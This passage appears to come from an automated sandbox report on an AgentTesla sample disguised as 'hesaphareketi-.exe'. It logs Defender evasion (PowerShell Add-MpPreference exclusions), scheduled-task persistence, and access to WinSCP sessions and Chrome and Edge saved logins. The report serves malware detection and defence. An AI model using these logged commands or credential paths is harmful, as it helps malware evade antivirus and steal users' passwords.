                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeThread delayed: delay time: 1195671
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeThread delayed: delay time: 1195562
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeThread delayed: delay time: 1195453
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeThread delayed: delay time: 1195343
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeThread delayed: delay time: 1195234
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeThread delayed: delay time: 1195124
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeThread delayed: delay time: 1195014
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeThread delayed: delay time: 1194906
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeThread delayed: delay time: 1194796
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeThread delayed: delay time: 1194687
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeThread delayed: delay time: 1194559
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeThread delayed: delay time: 1194452
                    Source: hesaphareketi-.exe, 00000008.00000002.4488496457.000000000134E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllstringVirtualizationFirmwareEnabled
                    Source: xyodEPhulIrkY.exe, 0000000D.00000002.4489177545.0000000000F68000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeMemory allocated: page read and write | page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Adds a directory exclusion to Windows Defender
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\hesaphareketi-.exe"
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe"
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\hesaphareketi-.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\hesaphareketi-.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\xyodEPhulIrkY" /XML "C:\Users\user\AppData\Local\Temp\tmpE555.tmp"Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess created: C:\Users\user\Desktop\hesaphareketi-.exe "C:\Users\user\Desktop\hesaphareketi-.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\xyodEPhulIrkY" /XML "C:\Users\user\AppData\Local\Temp\tmpBF7D.tmp"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeProcess created: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe "C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeQueries volume information: C:\Users\user\Desktop\hesaphareketi-.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeQueries volume information: C:\Users\user\Desktop\hesaphareketi-.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeQueries volume information: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeQueries volume information: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Stealing of Sensitive Information

                    barindex
                    Yara detected AgentTesla
                    Source: Yara matchFile source: dump.pcap, type: PCAP
                    Source: Yara matchFile source: 0.2.hesaphareketi-.exe.3474e08.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.xyodEPhulIrkY.exe.3645378.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.hesaphareketi-.exe.34af428.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.2.hesaphareketi-.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.xyodEPhulIrkY.exe.367f998.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.hesaphareketi-.exe.34af428.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.xyodEPhulIrkY.exe.367f998.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.xyodEPhulIrkY.exe.3645378.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.hesaphareketi-.exe.3474e08.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000D.00000002.4492600143.0000000002CFE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.4487969528.0000000000403000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.2100310326.0000000003645000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.4492018819.000000000304E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2069027456.0000000003474000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.4492600143.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.4492018819.0000000003001000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: hesaphareketi-.exe PID: 6516, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: hesaphareketi-.exe PID: 5300, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: xyodEPhulIrkY.exe PID: 2828, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: xyodEPhulIrkY.exe PID: 1628, type: MEMORYSTR
                    Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                    Tries to harvest and steal browser information (history, passwords, etc)
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
